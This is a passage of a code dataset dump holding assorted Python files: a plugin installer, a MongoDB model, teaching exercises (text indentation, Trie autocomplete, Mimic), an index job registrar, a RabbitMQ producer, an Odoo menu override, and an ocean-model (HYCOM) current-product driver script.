выполнять для установки и удаления плагинов\n NAME_AFTER_INSTALL = 'install.py'\n NAME_BEFORE_UNINSTALL = 'uninstall.py'\n\n @abstractmethod\n def install(self, pl):\n \"\"\"\n \"\"\"\n\n @abstractmethod\n def uninstall(self, pl):\n \"\"\"\n \"\"\"\n\n\nclass TestInstaller(Installer):\n \"\"\"\n Ничего не делает, только для тестов\n \"\"\"\n\n @method_check_arg(Plugin)\n def install(self, plugin_info):\n pass\n\n\n @method_check_arg(Plugin)\n def uninstall(self, plugin_info):\n pass\n\n\nclass SimpleInstaller(Installer):\n \"\"\"\n Простой установщик, умеет только копировать из папки в папку\n \"\"\"\n\n def __init__(self):\n #Папка куда будем ставить все плагины\n self.install_dir = None\n\n @property\n def install_dir(self):\n return self._install_dir\n\n @install_dir.setter\n def install_dir(self, value):\n self._install_dir = value\n\n def _has_script(self, target, name):\n \"\"\"\n @param target: папка в котрой ищем файл с именем name, абсолютный путь\n @return: boolean есть файл в папке или нет\n \"\"\"\n for f in os.listdir(target):\n if f == name:\n return True\n return False\n\n @method_check_arg(Plugin)\n def install(self, plugin_info):\n try:\n target = os.path.join(self.install_dir,\n os.path.basename(plugin_info.path))\n\n shutil.copytree(plugin_info.path, target)\n except:\n raise MPException(\"Could not install plugin: %s.\" %\n plugin_info.get_name())\n if self._has_script(target, self.NAME_AFTER_INSTALL):\n execfile(os.path.join(target, self.NAME_AFTER_INSTALL))\n\n\n @method_check_arg(Plugin)\n def uninstall(self, plugin_info):\n target = os.path.join(self.install_dir,\n os.path.basename(plugin_info.path))\n if self._has_script(target, self.NAME_BEFORE_UNINSTALL):\n execfile(os.path.join(target, self.NAME_BEFORE_UNINSTALL))\n try:\n shutil.rmtree(os.path.join(self.install_dir,\n os.path.basename(plugin_info.path)))\n except OSError:\n raise MPException(\n \"Could not uninstall plugin: %s.\" % plugin_info.get_name())\n\n\n","sub_path":"masterpl/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591759545","text":"class Article(object):\n def __init__(self, mongo):\n self.mongo = mongo\n\n self.title = ''\n self.author = ''\n self.date = ''\n self.content = ''\n self.plaintext = ''\n\n def dict_fields(self):\n return dict({'title': self.title, 'author': self.author,\n 'date': self.date, 'content': self.content,\n 'plaintext': self.plaintext})\n\n def add_to_article_collection(self, title, author, date='', content='', plaintext=''):\n self.title = title\n self.author = author\n self.date = date\n self.content = content\n self.plaintext = plaintext\n\n article_collection = self.mongo.db.articles\n # article_collection.createIndex({'title': self.title}, {'unique': True})\n article_collection.insert(self.dict_fields())\n return 1\n\n def get_articles(self, page=0, size=10):\n print(\"article.py.get_articles: page \", page, \" size \", size)\n cursor = self.mongo.db.articles.find().skip(page * size).limit(size)\n print(\"get_articles: \", cursor)\n articles_arr = []\n for article in cursor:\n articles_arr.append(article)\n return articles_arr\n\n def get_article_by_id(self, article_id):\n cursor = self.mongo.db.articles.find({'_id': article_id})\n result = None\n for article in cursor:\n result = article\n # remove _id: ObjectId()\n del result['_id']\n return result\n","sub_path":"artistnest/_models/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384373353","text":"#!/usr/bin/python3\n\n\n\"\"\"\nprints text with 2 newlines after a period, colon, and question mark\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\" prints a newline whenever a . ? and : is seen\n\n Args:\n text (str): input string\n\n Returns:\n void: prints to stdout\n\n \"\"\"\n\n if not isinstance(text, str):\n raise TypeError('text must be a string')\n\n i = 0\n while i < len(text):\n if text[i] in '.?:' and i != len(text) - 1 and text[i + 1] in ' ':\n print(\"{}\\n\".format(text[i]))\n for j in range(i + 1, len(text)):\n if text[j] == ' ':\n i += 1\n else:\n i += 1\n break\n # loop exits at last whitespace character\n # increment i to go beyond it\n if text[i] == ' ':\n i += 1\n elif text[i] in '.?:':\n print(\"{}\\n\".format(text[i]))\n i += 1\n else:\n print(text[i], end='')\n i += 1\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"521134625","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: zlikun\nimport json\n\n\ndef headers(ext_headers={}):\n \"\"\"\n 请求消息头\n\n :param ext_headers:\n :return:\n \"\"\"\n data = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/63.0.3239.132 Safari/537.36\",\n \"Connection\": \"keep-alive\",\n }\n data.update(ext_headers)\n return data\n\n\ndef get_first_item(lst):\n \"\"\"\n 从列表中取得第一个元素,如果列表空,返回None\n\n :param lst:\n :return:\n \"\"\"\n if lst:\n return lst[0]\n else:\n return None\n\n\ndef convert_id_string(data):\n \"\"\"\n 转换字典中的_id字段为字符串类型(针对ObjectId类型)\n\n :param data:\n :return:\n \"\"\"\n if data and \"_id\" in data:\n data[\"_id\"] = str(data[\"_id\"])\n return data\n\n\nif __name__ == '__main__':\n print(json.dumps(headers({\"User-Agent\": \"requests/2.19.1\"}), indent=4))\n print(json.dumps(headers({\"Host\": \"www.biquge5200.cc\", \"Referer\": \"www.biquge5200.cc\"}), indent=4))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263108417","text":"import logging\nimport os\nimport time\nfrom datetime import datetime\nfrom enum import Enum\nfrom types import SimpleNamespace\n\nfrom biothings.utils.common import timesofar\n\n\ndef merge(x, dx):\n \"\"\"\n Merge dictionary dx (Δx) into dictionary x.\n If __REPLACE__ key is present in any level z in dx,\n z in x is replaced, instead of merged, with z in dx.\n \"\"\"\n assert isinstance(x, dict)\n assert isinstance(dx, dict)\n\n if dx.pop(\"__REPLACE__\", None):\n # merge dx with \"nothing\" just to\n # make sure to remove any \"__REPLACE__\"\n _y = {}\n merge(_y, dx)\n x.clear()\n x.update(_y)\n return\n\n for k, v in dx.items():\n if isinstance(v, dict):\n if not isinstance(x.get(k), dict):\n x[k] = {}\n merge(x[k], v)\n else:\n x[k] = v\n\ndef test_merge_0():\n x = {}\n y = {}\n merge(x, y)\n print(x)\n\ndef test_merge_1():\n x = {\n \"index\": {\n \"name1\": {\n \"doc_type\": \"news\",\n \"happy\": False\n }\n }\n }\n y = {\n \"index\": {\n \"name1\": {\n \"happy\": True,\n \"count\": 100\n }\n }\n }\n merge(x, y)\n print(x)\n\ndef test_merge_2():\n x = {\"a\": {\"b\": \"c\"}}\n y = {\"a\": {\n \"__REPLACE__\": True,\n \"b'\": {\n \"__REPLACE__\": False,\n \"c\": \"d\"\n }\n }}\n merge(x, y)\n print(x)\n\ndef test_merge_3():\n x = {\"a\": \"b\"}\n y = {\"a\": {\"b\": \"c\"}}\n merge(x, y)\n print(x)\n\ndef test_merge_4():\n x = {\"a\": {\"__REPLACE__\": True, \"b\": \"c\"}, \"__REPLACE__\": True}\n y = {\"a\": {\"b\": \"d\"}}\n merge(x, y)\n print(x)\n\nclass Stage(Enum):\n READY = 0\n STARTED = 1\n DONE = 2\n\n# an implementation like this should be further\n# generalized to replace utils.manager.BaseStatusRegisterer\n\nclass IndexJobStatusRegistrar():\n\n def __init__(self, indexer, collection):\n self.indexer = indexer\n self.collection = collection\n self.stage = Stage.READY\n self.t0 = 0\n\n @staticmethod\n def prune(collection):\n for build in collection.find():\n dirty = False\n for job in build.get(\"jobs\", []):\n if job.get(\"status\") == \"in progress\":\n logging.warning((\n \"Found stale build '%s', \"\n \"marking index status as 'cancelled'\"),\n build[\"_id\"])\n job[\"status\"] = \"cancelled\"\n job.pop(\"pid\", None)\n dirty = True\n if dirty:\n collection.replace_one({\"_id\": build[\"_id\"]}, build)\n\n def started(self, step=\"index\"):\n\n assert self.stage == Stage.READY\n self.stage = Stage.STARTED\n\n self.t0 = time.time()\n\n job = {\n \"step\": step,\n \"status\": \"in progress\",\n \"step_started_at\": datetime.now().astimezone(),\n \"logfile\": self.indexer.logfile,\n \"pid\": os.getpid()\n }\n self.collection.update(\n {\"_id\": self.indexer.target_name},\n {\"$push\": {\n \"jobs\": job\n }}\n )\n\n def failed(self, error):\n def func(job, delta_build):\n job[\"status\"] = \"failed\"\n job[\"err\"] = str(error)\n self._done(func)\n\n def succeed(self, **result):\n def func(job, delta_build):\n job[\"status\"] = \"success\"\n merge(delta_build, result)\n self._done(func)\n\n def _done(self, func):\n\n assert self.stage == Stage.STARTED\n self.stage = Stage.DONE\n\n build = self.collection.find_one({'_id': self.indexer.target_name})\n assert build, \"Can't find build document '%s'\" % self.indexer.target_name\n\n job = build[\"jobs\"][-1]\n job[\"time\"] = timesofar(self.t0)\n job[\"time_in_s\"] = round(time.time() - self.t0, 0)\n job.pop(\"pid\")\n\n delta_build = {}\n func(job, delta_build)\n merge(build, delta_build)\n self.collection.replace_one({\"_id\": build[\"_id\"]}, build)\n\nclass PreIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('pre-index')\n\nclass MainIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('index')\n\n def succeed(self, **result):\n\n # after finishing the inital indexing\n # save the index metadata to field \"index\"\n\n delta_build = {\n \"index\": {\n self.indexer.index_name: {\n '__REPLACE__': True,\n 'host': self.indexer.host,\n 'environment': self.indexer.env,\n 'conf_name': self.indexer.conf_name,\n 'target_name': self.indexer.target_name,\n 'index_name': self.indexer.index_name,\n 'doc_type': self.indexer.doc_type,\n 'num_shards': self.indexer.num_shards,\n 'num_replicas': self.indexer.num_replicas,\n 'created_at': datetime.now().astimezone()\n }\n }\n }\n merge(delta_build, result)\n super().succeed(**delta_build)\n\nclass PostIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('post-index')\n\n\ndef test_registrar():\n from pymongo import MongoClient\n indexer = SimpleNamespace(\n host='localhost:9200',\n target_name=\"mynews_202012280220_vsdevjdk\", # must exists in DB\n index_name=\"__index_name__\",\n doc_type='news',\n num_shards=1,\n num_replicas=0,\n logfile='/log/file',\n conf_name='bc_news',\n env='dev'\n )\n collection = MongoClient().biothings.src_build\n IndexJobStatusRegistrar.prune(collection)\n\n # ----------\n # round 1\n # ----------\n\n job = MainIndexJSR(indexer, collection)\n\n input()\n job.started()\n input()\n job.failed(\"MockErrorA\")\n input()\n try:\n job.succeed()\n except Exception as exc:\n print(exc)\n\n # ----------\n # round 2\n # ----------\n\n job = MainIndexJSR(indexer, collection)\n\n input()\n job.started()\n input()\n job.succeed(index={\"__index_name__\": {\"count\": \"99\"}})\n\n # ----------\n # round 3\n # ----------\n\n job = PostIndexJSR(indexer, collection)\n\n input()\n try:\n job.succeed()\n except Exception as exc:\n print(exc)\n\n input()\n job.started()\n\n input()\n job.succeed(index={\"__index_name__\": {\"additionally\": \"done\"}})\n\n\nif __name__ == '__main__':\n test_registrar()\n","sub_path":"biothings/hub/dataindex/indexer_registrar.py","file_name":"indexer_registrar.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329240569","text":"import pika\n\nrmq_host = '192.168.99.100'\nrmq_port = '5672'\n\nconn_params = pika.ConnectionParameters(rmq_host, rmq_port)\nconnection = pika.BlockingConnection(conn_params)\n\nchannel = connection.channel()\n# Durable queue allows messages to restart RabbitMQ server crash or restart\nchannel.queue_declare(queue='hello',durable=True)\n# Also send messaget with persistent flag set\nchannel.basic_publish(exchange='',\n routing_key='hello',\n properties=pika.BasicProperties(\n delivery_mode = 2, # make message persistent\n ),\n body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()","sub_path":"prefetch_qos/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"305941965","text":"# -*- coding: utf-8 -*-\nfrom odoo import models\n\nclass IrUiMenu(models.Model):\n _inherit = 'ir.ui.menu'\n\n def get_needaction_data(self, ids):\n \"\"\" Return for each menu entry of ids :\n - if it uses the needaction mechanism (needaction_enabled)\n - the needaction counter of the related action, taking into account\n the action domain\n \"\"\"\n res = {}\n for menu in self.browse(ids):\n res[menu.id] = {\n 'needaction_enabled': False,\n 'needaction_counter': False,\n }\n if menu.action and menu.action.type in ('ir.actions.act_window', 'ir.actions.client') and menu.action.res_model:\n if menu.action.res_model in self.env:\n obj = self.env[menu.action.res_model]\n if obj._needaction:\n if menu.action.type == 'ir.actions.act_window':\n dom = menu.action.domain and eval(menu.action.domain, {'uid': self.env.uid}) or []\n else:\n dom = eval(menu.action.params_store or '{}', {'uid': uid}).get('domain')\n res[menu.id]['needaction_enabled'] = obj._needaction\n res[menu.id]['needaction_counter'] = obj._needaction_count(dom)\n return res","sub_path":"badge_menu/models/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"209730379","text":"import tkinter as tk\nfrom system.gui.widgets.factory import create_widget\nfrom system.gui.widgets.excel import Excel\n\n\nclass ManualLockView:\n \n def __init__(self, root_view, lock):\n self.root_view = root_view\n\n title = 'Lock Entries' if lock else 'Release Entries'\n self.window = create_widget('toplevel', master=self.root_view.root, title=title)\n\n self.widget = {}\n\n frame_n_row = create_widget('frame', master=self.window, row=0, column=0, sticky=None, pady=0)\n self.widget['disp_n_row'] = create_widget('labeled_entry',\n master=frame_n_row, row=0, column=0, text='Number of rows', class_type='int')\n self.widget['set_n_row'] = create_widget('button', master=frame_n_row, row=0, column=1, text='Update')\n\n self.widget['rowid_excel'] = Excel(master=self.window, rows=1, columns=1, width=10, \n title=['Row number'], dtype=[int], default=None, required=[True], required_mark=False)\n self.widget['rowid_excel'].grid(row=1, column=0)\n\n frame_action = create_widget('frame', master=self.window, row=2, column=0, sticky=None, pady=0)\n self.widget['start'] = create_widget('button', master=frame_action, row=0, column=0, text='Lock' if lock else 'Release')\n self.widget['cancel'] = create_widget('button', master=frame_action, row=0, column=1, text='Cancel')","sub_path":"system/technician/manual_lock/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"423049039","text":"import torch\nimport numpy as np\nimport time\nimport pdb\nfrom rlkit.torch.policies.tanh_gaussian_policy import TanhGaussianPolicy\nfrom rlkit.torch.policies.make_deterministic import MakeDeterministic\nfrom rlkit.torch.policies.gumbel_softmax_policy import GumbelSoftmaxMlpPolicy\nfrom rlkit.policies.argmax import ArgmaxDiscretePolicy\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str, default='spread')\nparser.add_argument('--num_ag', type=int, default=2)\nparser.add_argument('--log_dir', type=str, default='MASAC')\nparser.add_argument('--epoch', type=int, default=None)\nparser.add_argument('--seed', type=str, default=0)\nargs = parser.parse_args()\n\npre_dir = './Data/'+args.exp_name+'_p'+str(args.num_ag)\nif args.epoch:\n\tdata_path = '{}/{}/seed{}/itr_{}.pkl'.format(pre_dir,args.log_dir,args.seed,args.epoch)\nelse:\n\tdata_path = '{}/{}/seed{}/params.pkl'.format(pre_dir,args.log_dir,args.seed)\ndata = torch.load(data_path,map_location='cpu')\npolicy_n = data['trainer/policy_n']\npolicy_n = [MakeDeterministic(policy) for policy in policy_n]\n\nenv_kwargs=dict(\n game_name=args.exp_name,\n agent_num=args.num_ag,\n)\nfrom particle_1d import Particle1D\nenv = Particle1D(**env_kwargs)\nnum_agent = env.agent_num\n\nwhile True:\n\to_n = env.reset()\n\ta_n = []\n\tfor (policy,o) in zip(policy_n,o_n):\n\t\ta, _ = policy.get_action(o)\n\t\ta_n.append(a)\n\to_n, r_n, done, _ = env.step(a_n)\n\tprint(\"a: \",a_n)\n\tprint(\"o: \",o_n)\n\tprint('r: ',r_n)\n\tprint(done)\n\tenv.render()\n\tpdb.set_trace()","sub_path":"tests/Particle1D/visualize_policy.py","file_name":"visualize_policy.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273080274","text":"# NO IMPORTS!\n\nclass Trie:\n ##################################################\n ## basic methods\n ##################################################\n\n def __init__(self):\n self.frequency = 0\n self.children = {}\n\n # add word/frequency to the trie. Increment frequency\n # if no value supplied.\n def insert(self, word, frequency=None):\n if len(word) == 0:\n self.frequency += 1 if frequency == None else frequency\n else:\n self.children[word[0]] = self.children.get(word[0],Trie())\n self.children[word[0]].insert(word[1:],frequency)\n\n # return trie node for specified prefix, None if not in trie\n def find(self,prefix):\n if len(prefix) == 0:\n return self\n else:\n if prefix[0] in self.children:\n return self.children[prefix[0]].find(prefix[1:])\n else:\n return None\n\n # is word in trie? return True or False\n def __contains__(self, word):\n return bool(self.getFreq(word))\n\n # return list of [word,freq] pairs for all words in\n # this trie and its children\n def __iter__(self):\n return self.iterHelper()\n\n def iterHelper(self,extra=''):\n for i in self.children:\n yield from self.children[i].iterHelper(extra+i)\n if self.frequency != 0:\n yield [extra,self.frequency]\n \n ##################################################\n ## additional methods\n ##################################################\n\n # return the list of N most-frequently occurring words that start with prefix.\n def autocomplete(self, prefix, N):\n try:\n myNode = self.find(prefix)\n myList = [i for i in myNode.iterHelper(prefix)]\n myList.sort(key = lambda x: x[1],reverse = True)\n return [j[0] for j in myList[:N]]\n except AttributeError:\n return []\n \n \n # return the list of N most-frequent words that start with prefix or that\n # are valid words that differ from prefix by a small edit\n def autocorrect(self, prefix, N):\n try:\n myNode = self.find(prefix)\n if myNode == None:\n myList = []\n raise IndexError\n else:\n myList = [i for i in myNode.iterHelper(prefix)]\n myList.sort(key = lambda x: x[1],reverse = True)\n return [myList[j][0] for j in range(N)]\n except IndexError:\n print(myList)\n myCorr = [[i,self.getFreq(i)] for i in self.autoHelper(prefix) if (i in self and [i,self.getFreq(i)] not in myList)]\n myCorr.sort(key = lambda x: x[1],reverse = True)\n print(myCorr)\n myList = myList + myCorr\n print(myList)\n return [i[0] for i in myList[:N]]\n \n def getFreq(self,word):\n if len(word) == 0:\n return self.frequency\n else:\n if word[0] in self.children:\n return self.children[word[0]].getFreq(word[1:])\n else:\n return False\n\n def autoHelper(self,prefix):\n for i in 'abcdefghijklmnopqrstuvwxyz':\n for j in range(len(prefix)+1):\n yield prefix[:j] + i + prefix[j:]\n for k in range(len(prefix)):\n yield prefix[:k] + prefix[k+1:]\n for m in 'abcdefghijklmnopqrstuvwxyz':\n for n in range(len(prefix)):\n yield prefix[:n] + m + prefix[n+1:]\n if len(prefix) >= 2:\n for l in range(len(prefix)-1):\n yield prefix[:l] + prefix[l+1] + prefix[l] + prefix[l+2:]\n # return list of [word, freq] for all words in trie that match pattern\n # pattern is a string, interpreted as explained below\n # * matches any sequence of zero or more characters\n # ? matches any single character\n # otherwise char in pattern char must equal char in word\n def filter(self,pattern):\n myTransformed = self.splitterPattern(pattern)\n myList = []\n for i in self:\n if self.decider(myTransformed,i[0]):\n myList.append(i)\n return myList\n\n def decider(self,myList,word):\n newList = myList[:]\n myWord = word[:]\n if len(myList) == 0:\n return False if len(word) > 0 else True\n else:\n if myList[0] == \"*\":\n return any([self.decider(myList[1:],word[i:]) for i in range(len(word)+1)])\n elif myList[0] == \"?\":\n return self.decider(myList[1:],word[1:]) if len(word) > 0 else False\n else:\n if myList[0] == word[:len(myList[0])]:\n return self.decider(myList[1:],word[len(myList[0]):])\n else:\n return False\n\n\n def splitterPattern(self,pattern):\n myList = []\n myTemp = ''\n for i in range(len(pattern)):\n if pattern[i] == '*' or pattern[i] == '?':\n if myTemp != '':\n myList.append(myTemp)\n myTemp = pattern[i]\n myList.append(myTemp)\n myTemp = ''\n else:\n myTemp += pattern[i]\n if i == len(pattern)-1:\n myList.append(myTemp) \n return myList\n\n# handy stand-alone testing setup\nif __name__ == '__main__':\n # read in words\n import json # this import allowed as part of testing...\n with open('resources/words.json') as f:\n words = json.load(f)\n\n \"\"\"\n # small corpus: insert words one-by-one\n trie = Trie()\n for w in words[:50]: trie.insert(w)\n \"\"\"\n\n # large corpus: precompute count for each word\n trie = Trie()\n for w in set(words):\n trie.insert(w,words.count(w))\n\n # your test here!\n # Example: 5- or more letter words beginning in \"a\" and ending in \"ing\"\n #print(trie.filter('a?*ing'))\n","sub_path":"6.009/lab_7/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641121855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n\"\"\"\nMimic exercise\n\nRead in the file specified on the command line.\nDo a simple split() on whitespace to obtain all the words in the file.\nRather than read the file line by line, it's easier to read it into\none giant string and split it once.\n\nNote: the standard python module 'random' includes a random.choice(list)\nmethod which picks a random element from a non-empty list.\n\nYou can try adding in line breaks around 70 columns so the output looks\nbetter.\n\"\"\"\n\n__author__ = \"Chris Warren with help from Cheria Artis, Tiffany McLean, Piero Madar, & Stack Overflow\"\n\nimport random\nimport sys\n\ndef create_mimic_dict(filename):\n \"\"\"\n Returns a dict mapping each word to a list of words which follow it.\n For example:\n Input: \"I am a software developer, and I don't care who knows\"\n Output:\n {\n \"\" : [\"I\"],\n \"I\" : [\"am\", \"don't\"],\n \"am\": [\"a\"],\n \"a\": [\"software\"],\n \"software\" : [\"developer,\"],\n \"developer,\" : [\"and\"],\n \"and\" : [\"I\"],\n \"don't\" : [\"care\"],\n \"care\" : [\"who\"],\n \"who\" : [\"knows\"]\n }\n \"\"\"\n mimic_dict = {}\n with open(filename, 'r') as file:\n text = file.read()\n words = text.split()\n prev_word = ''\n for word in words:\n if prev_word not in mimic_dict:\n mimic_dict[prev_word] = [word]\n else:\n mimic_dict[prev_word].append(word)\n prev_word = word \n print (len(mimic_dict.keys()))\n\n return mimic_dict\n\ndef print_mimic(mimic_dict, start_word):\n \"\"\"\n Given a previously created mimic_dict and start_word,\n prints 200 random words from mimic_dict as follows:\n - Print the start word\n - Look up the start word in your mimic_dict and get its next-list\n - Randomly select a new word from the next-list\n - Repeat this process 200 times\n \"\"\"\n start_word = random.choice(list(mimic_dict.keys()))\n for i in range(200):\n print(start_word, end= \" \")\n next_word_list = mimic_dict.get(start_word)\n if next_word_list is None:\n next_word_list = mimic_dict[\"\"]\n start_word = random.choice(next_word_list)\n \ndef main():\n if len(sys.argv) != 2:\n print('usage: python mimic.py file-to-read')\n sys.exit(1)\n\n d = create_mimic_dict(sys.argv[1])\n print_mimic(d, '')\n\nif __name__ == '__main__':\n main()","sub_path":"mimic.py","file_name":"mimic.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14024175","text":"#!/home/operador/anaconda3/envs/auxdechycom/bin/python\n# -*- coding: utf-8 -*-\n# -*- coding: iso-8859-1 -*-\n#\n# Esta rotina eh a rotina-mae dos auxilios-a-decisao do HYCOM.\n#\n# Tres rotinas sao chamadas, dependendo do que for solicitado:\n#\n# 1. corrente_hycom.py:\n# Chama rotinas que fazem figuras de campos de corrente\n# horizontal em diferentes niveis verticais.\n#\n# 2. cvert_hycom.py:\n# Faz secoes transversais de corrente horizontal centrada\n# em lat/lon pre-definida.\n#\n# 3. txts_hycom1.py:\n# Chama rotinas que fazem arquivos de texto com dados das\n# correntes horizontais em diferentes niveis verticais.\n# IMPORTANTE: há tres arquivos, a saber:\n# - txts_hycom1.py: uma rotina, chamada por este script.\n# - txts_hycom2.txt: nao eh uma rotina. Ler e seguir suas\n# instrucoes.\n# - txts_hycom3.py: uma rotina a ser executada manualmente.\n#\n# Informacoes adicionais referentes destes produtos podem ser\n# encontrados nos cabecalhos das rotinas listadas acima.\n#\n# Autor: 1T (T) THALLES\n# Data: 29ABR2018\n# Ultima atualizacao: 08MAI2019\n\n# ------------------------------------------------------------>\n# IMPORTACAO DE BIBLIOTECAS E DEFINICAO DE DIRETORIOS:\n\n# Bibliotecas utilizadas:\nimport os\nimport numpy as np\nimport sys\n\n# Diretorios-chave (somente altera-los caso eles mudem):\ndirlocal = '/home/operador/AuxDec_HYCOM'\ndirpython = '/home/operador/anaconda3/envs/auxdechycom/bin/python'\n\n# ============================================================>\n# DATA DA RODADA DO HYCOM A SER UTILIZADA:\n\nif (len(sys.argv)-1 != 1):\n print('')\n print('+-------------------------------------------------------+')\n print('| |')\n print('| Insira a data de rodada do HYCOM na forma AAAAMMDD. |')\n print('| Exemplo: ./auxdec_hycom.py 20190618 |')\n print('| |')\n print('+-------------------------------------------------------+')\n print('')\n\nano = str(sys.argv[1][0:4])\nmes = str(sys.argv[1][4:6])\ndia = str(sys.argv[1][6:8])\n\n# ============================================================>\n# --- INICIO DA EDICAO DA ROTINA POR PARTE DO USUARIO -------->\n# ============================================================>\n\n# ============================================================>\n# PARTE 1 DE 4: lista de produtos a serem gerados:\n\n# Preencha abaixo conforme os produtos que estejam sendo\n# solicitados. Insira 'SIM' ou 'NAO', entre aspas simples.\n\n# Correntes horizontais (corrente_hycom.py):\ncorrente = 'SIM' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"corrente_hycom.py\".\n\n# Cortes verticais (cvert_hycom.py):\ncvert = 'NAO' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"cvert_hycom.py\".\n\n# Arquivos de texto .txt (txts_hycom1.py):\ntxts = 'NAO' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"txts_hycom1.py\".\n # IMPORTANTE: apos execucao de \"txts_hycom1.py\",\n # siga as instrucoes de \"txts_hycom2.txt\" e, apos,\n # execute \"txts_hycom3.py\".\n\n# Apos, preencha:\n# - os dados comuns a todos os produtos (PARTE 2 DE 5),\n# - os dados referentes aos produtos solicitados\n# (PARTE 3 DE 5 e/ou PARTE 4 DE 5 e/ou PARTE 5 DE 5).\n\n# ============================================================>\n# PARTE 2 DE 4: correntes horizontais (corrente_hycom.py):\n\n# Nome do evento (sera o titulo das figuras):\nnome = 'Modulos' # Nao utilizar espacos!\n\n# Resolucao do HYCOM:\nresHYCOM = '1/24' # '1/4', '1/12' ou '1/24'.\n\n# Area de interesse para a geracao da figura:\nlat_sul = '-26.8' # Latitude mais a sul.\nlat_norte = '-25.2' # Latitude mais a norte.\nlon_oeste = '-48.8' # Longitude mais a oeste.\nlon_leste = '-47' # Longitude mais a leste.\n\n# Pontos de interesse (e.g. local do evento, cidades de referencia):\npNome1 = 'Módulos' # Nome ponto 1 (evento).\nplon1 = -47.59 # Lon ponto 1 (evento).\nplat1 = -26.04 # Lat ponto 1 (evento).\npNome2 = 'São Francisco do Sul' # Nome ponto 2 (cidade referencia).\nplon2 = -48.51 # Lon ponto 2 (cidade referencia).\nplat2 = -26.23 # Lat ponto 2 (cidade referencia).\npNome3 = 'Ilha do Mel' # Nome ponto 3 (outra cidade referencia).\nplon3 = -48.31 # Lon ponto 3 (outra cidade referencia).\nplat3 = -25.52 # Lat ponto 3 (outra cidade referencia).\n\n# Temos que as lat/lon extremas do HYCOM sao:\n# HYCOM 0.25 (i.e. HYCOM 1/4) \n# lonming=-98.0\n# lonmaxg=21.0\n# latming=-78.0\n# latmaxg=50.0\n# HYCOM 0.08 (i.e. HYCOM 1/12) \n# lonming=-68.0\n# lonmaxg=-18.0\n# latming=-45.0\n# latmaxg=10.0\n# HYCOM 0.04 (i.e. HYCOM 1/24)\n# lonming=-54.0\n# lonmaxg=-32.0\n# latming=-34.0\n# latmaxg=-12.0\n\n# Quantidade de prognósticos desejados (saidas horarias):\nprog='97' # Previsao de [analise] ate [analise+(XX+1)].\n\n# Densidade de vetores:\nskip = int('1') # Quantidade de pontos entre vetores.\n# OBS: quanto maior o zoom menor o skip.\n# OBS: atencao ao parâmetro \"scale\" do tamanho do vetor (L139).\n\n# ============================================================>\n# PARTE 3 DE 4: cortes verticais (cvert_hycom.py):\n\n# Mes da rodada do HYCOM a ser utilizada:\nmes_str = 'JUN' # 'JAN', 'FEV', 'MAR', ...\n\n# Dia da semana do dia da rodada:\ndia_sem = 'quinta-feira'\n\n# Latitude e longitude exata do ponto em questão:\n# (Nao eh um string! Valores em graus decimais!)\n# (Nao precisa ser coincidente com um no de calculo do\n# modelo.)\nlat_evento = -26.04 # Em graus decimais.\nlon_evento = -47.59 # Em graus decimais.\n\n# Nome do evento (para titulo das figuras):\nlocalidade = 'Módulos'\n\n# Valores delta_lat e delta_lon, para definir a largura das\n# imagens.\n# Dica: para vortices oceanicos de mesoescala, valores bons\n# estao entre 1 e 3.\n# Nota: o corte N-S ira de\n# [lat_evento - delta_lat] até [lat_evento + delta_lat].\n# Nota: o corte L-O ira de\n# [lon_evento - delta_lon] até [lon_evento + delta_lon].\ndelta_lat = 2 # Em graus; nao eh um string!\ndelta_lon = 2 # Em graus; nao eh um string!\n\n# Profundidade maxima a ser exibida nas secoes transversais:\nmax_prof = 100 # Em metros; nao eh um string!\n\n# ============================================================>\n# PARTE 4 DE 4: arquivos de texto .txt (txts_hycom1.py):\n\n# Nesta parte, preencha tudo com aspas simples!\n\n# Hora da previsao:\nHH = '00' # '00' ou '12'.\n\n# Longitude minima (vide limites abaixo!):\nlonmin = '-48'\n# Longitude maxima 